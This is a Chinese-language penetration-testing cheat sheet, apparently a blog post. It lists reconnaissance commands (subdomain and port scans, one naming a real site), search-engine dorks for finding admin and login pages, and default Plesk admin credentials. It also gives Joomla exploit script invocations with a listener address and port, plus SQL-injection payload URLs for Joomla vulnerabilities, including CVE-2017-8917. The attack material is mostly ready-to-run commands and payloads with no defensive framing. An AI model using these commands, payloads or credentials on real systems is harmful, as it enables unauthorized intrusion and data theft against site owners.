zoukankan      html  css  js  c++  java
  • 渗透测试

    扫子域,扫端口

    子域名:

    esd   esd -d xxxx.com

    jsfinder  python3 JSFinder.py -u http://tajikpost.tj/ru/ -d -ou mi_url.txt -os mi_subdomain.txt

    https://phpinfo.me/domain/

    Layer子域名挖掘机

    http://z.zcjun.com/

    subDomainsBrute  python subDomainsBrute.py xxx.com --full

    nmap -sS -p 1-65535 -v XXX.XXX.XXX.XXX

    DNS数据集平台:基于全网信息持续收集的平台,根据其收录的信息,以快速查找到需要的数据。

    (1) DNSdumpster:https://dnsdumpster.com/

    (2) VirusTotal:https://www.virustotal.com/#/home/search

    https://dnsdb.io/zh-cn/| https://x.threatbook.cn/

    防火墙(waf)识别

     wafw00f 命令

    nmap: nmap -sS -0 -p0 xxx.xxx.xxx -p-

    旁站信息收集

    http://dns.aizhan.com

    http://s.tool.chinaz.com/same

    http://i.links.cn/sameip/

    http://www.ip2hosts.com/

    https://phpinfo.me/bing.php

    http://www.webscan.cc/

    GitHub信息收集工具:https://github.com/MiSecurity/x-patrol

     cms识别:

    (1)  云悉:http://www.yunsee.cn/info.html

    (2)  查看数据包响应头

    (3)  CMS指纹识别:http://whatweb.bugscaner.com/look/

    搜索引擎语法

    后台:site:xxx.xxx admin|login|system|管理|登录|内部|系统

    钓鱼:site:xxx.xxx 邮件|email

    社工:site:xxx.xxx qq|群|微信|腾讯

    越权:site:xxx.xxx inurl:uid=1|userid=1

    包含:site:xxx.xxx inurl:php?include=

     Hosts碰撞:https://github.com/r35tart/Hosts_scan

     跑目录: python3 dirseach.py -u xxx.com -e php --random-agents

     cms:

    vulnx -u https://xxx.com --timeout 3 -c all -d -w –-exploit

    joomal:  python3 Joomla-3-4-6.py -t https://www.xx.com --exploit -l 127.0.0.1 -p 1234

    plesk 主机面板: 8443端口 默认的管理员账户密码是 admin,密码:stepu。

     Joomla:

    Joomla对象注入漏洞:https://www.freebuf.com/vuls/89754.html

     python joomla_exp.py http://www.xxx.com
     
     python 38977.py
     
    /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(exp(~(select * from(select md5(1))x)))
     
    joomal:  python3 Joomla-3-4-6.py -t https://www.xx.com --exploit -l 127.0.0.1 -p 1234
     
    Joomla 3.7.0 (CVE-2017-8917) SQL注入: http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
     
    python Joomla_3.4.4-3.6.3_未授权创建特权用户poc.py  
     

    扫源码泄露

    web中间件漏洞

    Tomcat:8080

    Jboss:8080

    WebLogic:7001,7002

    web框架漏洞

    Struts2

    Spring 

    web服务器漏洞

    IIS

    Apache

    Nginx

    lighttpd

    数据库漏洞

    MySQL:3306

    MSSQL:1433,1434

    Oracle:1521,1158,8080,210

    PostgreSQL:5432

    MongoDB:27017

    SysBase:5000,4100,4200

    服务协议漏洞

    FTP 

    Samba

    NFS 

    Samba

    SSH

    Telnet 

  • 相关阅读:
    css样式的六种选择器
    css 颜色表示法
    css 文本设置
    “http”和“https”的区别是什么?优缺点是什么?
    Httpclient
    接口认证:Bearer Token(Token 令牌)
    哪个参数用来区分请求来自客户(手机)端还是服务器(PC)端?
    常用的HTTP响应头
    Http 请求头包含哪些信息?
    单例集合的体系
  • 原文地址:https://www.cnblogs.com/xyhacker/p/11517181.html
Copyright © 2011-2022 走看看